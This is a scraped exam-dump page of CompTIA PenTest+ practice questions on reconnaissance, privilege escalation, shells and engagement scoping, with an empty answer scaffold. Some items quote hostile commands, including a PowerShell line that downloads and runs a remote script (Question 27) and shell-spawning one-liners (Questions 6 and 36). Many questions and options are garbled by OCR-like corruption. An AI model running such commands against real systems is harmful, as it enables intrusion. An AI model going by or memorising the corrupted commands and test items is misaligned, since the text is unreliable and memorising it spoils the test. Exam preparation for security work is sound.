Unlock your Full PT0-001 CompTIA Stable Exam

CompTIA PenTest+ Exam Questions and Answers

Question 1

At the information gathering stage, a penetration tester is trying to passively identify the technology running on

a client’s website. Which of the following approached should the penetration tester take?

Options:

Run a spider scan in Burp Suite.

Use web aggregators such as BuiltWith and Netcraft

Run a web scraper and pull the website’s content.

Use Nmap to fingerprint the website’s technology.

Question 2

A penetration tester observes that the content security policy header is missing during a web application

penetration test. Which of the following techniques would the penetration tester MOST likely perform?

Options:

Command injection attack

Clickjacking attack

Directory traversal attack

Remote file inclusion attack

Question 3

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

Options:

The tester discovers personally identifiable data on the system

The system shows evidence of prior unauthorized compromise

The system shows a lack of hardening throughout

The system becomes unavailable following an attempted exploit

The tester discovers a finding on an out-of-scope system

Question 4

A constant wants to scan all the TCP Pots on an identified device. Which of the following Nmap switches will complete this task?

Options:

-p-

-p ALX,

-p 1-65534

-port 1-65534

Question 5

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is

MOST critical and should be prioritized for exploitation?

Options:

Stored XSS

Fill path disclosure

Expired certificate

Clickjacking

Question 6

After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester's workstation Which of the following can be used to escape the limited shell and create a fully functioning TTY?

Options:

per1 -e ' : set shall=/bin/bash:shell'

php -r ,Sshell=f3hellopen("/bin/bash-);exec($9he:i)'

bash -i >fi /dev/localhosc Oil

python -c 'import pty;pcy.3pawn("/bin/bash")'

Question 7

When calculating the sales price of a penetration test to a client, which of the following is the MOST important aspect to understand?

Options:

The operating cost

The client's budget

The required scope of work

The non-disclosure agreement

Question 8

Click the exhibit button.

Question # 8

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Options:

SNMP brute forcing

ARP spoofing

DNS cache poisoning

SMTP relay

Question 9

Which of the following would BEST prevent fence jumping at a facility?

Options:

Install proper lighting around the perimeter of the facility.

Decrease the distance between the links in the fence.

Add a top guard on the fence that faces away from the facility.

Place video cameras that are angled toward the fence.

Question 10

Which of the following has a direct and significant impact on the budget of the security assessment?

Options:

Scoping

Scheduling

Compliance requirement

Target risk

Question 11

A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adversaries this would identify?

Options:

Script kiddies

APT actors

Insider threats

Hacktrvist groups

Question 12

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”

-sr –xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strmp

GLINC _2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

Options:

Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass

Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path “/home/user’. Then run changepass

Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw

Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’

Question 13

A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:

XSS
HTTP DELETE method allowed
SQL injection
Vulnerable to CSRF

To which of the following should the tester give the HIGHEST priority?

Options:

SQL injection

HTTP DELETE method allowed

Vulnerable to CSRF

XSS

Question 14

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question # 14

Options:

Question 15

A static code analysis report of a web application can be leveraged to identify:

Options:

business logic flaws.

insufficient input sanitization.

session fixation issues.

client-side data storage.

clickjacking.

Question 16

A client’s systems administrator requests a copy of the report from the penetration tester, but the systems

administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester’s

BEST course of action?

Options:

Send the report since the systems administrator will be in charge of implementing the fixes.

Send the report and carbon copy the point of contact/signatory for visibility.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

Forward the request to the point of contact/signatory for authorization.

Question 17

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

Code review
Updates to firewall settings

Which of the following has occurred in this situation?

Options:

Scope creep

Post-mortem review

Risk acceptance

Threat prevention

Question 18

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Options:

Download the GHOST file to a Linux system and compile

gcc -o GHOST

test i:

./GHOST

Download the GHOST file to a Windows system and compile

gcc -o GHOST GHOST.c

test i:

./GHOST

Download the GHOST file to a Linux system and compile

gcc -o GHOST GHOST.c

test i:

./GHOST

Download the GHOST file to a Windows system and compile

gcc -o GHOST

test i:

./GHOST

Question 19

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

Options:

Attempt to crack the service account passwords.

Attempt DLL hijacking attacks.

Attempt to locate weak file and folder permissions.

Attempt privilege escalation attacks.

Question 20

A system security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner working of these applications?

Options:

Launch the applications and use dynamic software analysis tools, including fuzz testing

Use a static code analyzer on the JAR filet to look for code Quality deficiencies

Decompile the applications to approximate source code and then conduct a manual review

Review the details and extensions of the certificate used to digitally sign the code and the application

Question 21

Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

Options:

wmic environment get name, variablevalue, username / findstr /i “Path” | findstr /i “service”

wmic service get /format:hform > c:\temp\services.html

wmic startup get caption, location, command | findstr /i “service” | findstr /v /i “%”

D. wmic service get name, displayname, patchname, startmode | findstr /i “auto” | findstr /i /v “c:\windows\\” | findstr /i /v “””

Question 22

While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Options:

Letter of engagement and attestation of findings

NDA and MSA

SOW and final report

Risk summary and executive summary

Question 23

A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Options:

RID cycling to enumerate users and groups

Pass the hash to relay credentials

Password brute forcing to log into the host

Session hijacking to impersonate a system account

Question 24

During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:

Question # 24

Which of the following lines of code is causing the problem?

Options:

url = “https://www.comptia.org?id=”

req = requests.get(url)

if req.status ==200:

url += i

Question 25

A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port The penetration tester wishes to forward that traffic back to a device Which of the following are the BEST tools to use few this purpose? (Select TWO)

Options:

Tcpdump

Nmap

Wiresrtark

SSH

Netcat

Cain and Abel

Question 26

Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

Options:

Mimikatz

BeEF

Nikto

Patator

Question 27

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/

script.ps1”);Invoke-Cmdlet

Which of the following BEST describes the actions performed this command?

Options:

Set the execution policy

Execute a remote script

Run an encoded command

Instantiate an object

Question 28

A penetration tester has gained physical access to a facility and connected directly into the internal network.

The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

Options:

Spoofing a printer’s MAC address

Abusing DTP negotiation

Performing LLMNR poisoning

Conducting an STP attack

Question 29

At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

Options:

Enumeration of services

OSINT gathering

Port scanning

Social engineering

Question 30

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

Options:

Selection of the appropriate set of security testing tools

Current and load ratings of the ICS components

Potential operational and safety hazards

Electrical certification of hardware used in the test

Question 31

While conducting information gathering, a penetration tester is trying to identify Windows hosts. Which of the following characteristics would be BEST to use for fingerprinting?

Options:

The system responds with a MAC address that begins with 00:0A:3B.

The system responds with port 22 open.

The system responds with a TTL of 128.

The system responds with a TCP window size of 5840.

Question 32

Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

Options:

Peach

CeWL

OpenVAS

Shodan

Question 33

Which of the following BEST describes why an MSA is helpful?

Options:

It contractually binds both parties to not disclose vulnerabilities.

It reduces potential for scope creep.

It clarifies the business arrangement by agreeing to specific terms.

It defines the timelines for the penetration test.

Question 34

While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that

imports a DLL by name rather than an absolute path. To exploit this vulnerability, which of the following criteria

must be met?

Options:

Permissions not disabled in the DLL

Weak folder permissions of a directory in the DLL search path

Write permissions in the C:\Windows\System32\imports directory

DLL not cryptographically signed by the vendor

Question 35

A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)

Options:

Query an Internet WHOIS database.

Search posted job listings.

Scrape the company website.

Harvest users from social networking sites.

Socially engineer the corporate call center.

Question 36

A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn( "/bin/bash").' Which of the following actions is the tester taking?

Options:

Removing the Bash history

Upgrading the shell

Creating a sandbox

Capturing credentials

Question 37

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part1

Question # 37

Part2

Question # 37

Options:

Question 38

While trying to maintain persistence on a Windows system with limited privileges, which of the following

registry keys should the tester use?

Options:

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

Question 39

A penetration testing company is performing a penetration test against Company A. Company A has provided the IP address range 10.0.0.0/24 as its in-scope network range. During the information gathering phase, the penetration tester is asked to conduct active information-gathering techniques. Which of the following is the BEST tool to use for active information gathering?

Options:

hping3

theHarvester

tcpdump

Nmap

Question 40

After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

Options:

Services are not listening

The network administrator shut down services

The host was not reachable

A firewall/IPS blocked the scan

Question 41

Which of the following attacks is commonly combined with cross-site scripting for session hijacking?

Options:

CSRF

Clickjacking

SQLI

RFI

Question 42

While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?

Options:

Levels of difficulty to exploit identified vulnerabilities

Time taken to accomplish each step

Risk tolerance of the organization

Availability of patches and remediations

Question 43

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.

Which of the following BEST describes the reasoning for this?

Options:

Manufacturers developing IoT devices are less concerned with security.

It is difficult for administrators to implement the same security standards across the board.

IoT systems often lack the hardware power required by more secure solutions.

Regulatory authorities often have lower security requirements for IoT systems.

Question 44

Which of the following actions BEST matches a script kiddie's threat actor?

Options:

Exfiltrate network diagrams to perform lateral movement

Steal credit cards from the database and sell them in the deep web

Install a rootkit to maintain access to the corporate network

Deface the website of a company in search of retribution

Load More PT0-001 Questions

Labour Day Special Limited Time Flat 70% Discount offer - Ends in 0d 00h 00m 00s - Coupon code: 70spcl

Activedumpsnet Logo

Activedumpsnet Navigation

Activedumpsnet Slider

CompTIA PT0-001 CompTIA PenTest+ Exam Exam Practice Test

CompTIA PenTest+ Exam Questions and Answers

Options:

Answer:

Explanation:

Options:

Answer:

Explanation:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Explanation:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Explanation:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Explanation:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Explanation:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Options:

Answer:

Explanation:

Options:

Answer:

Options:

Answer:

Explanation: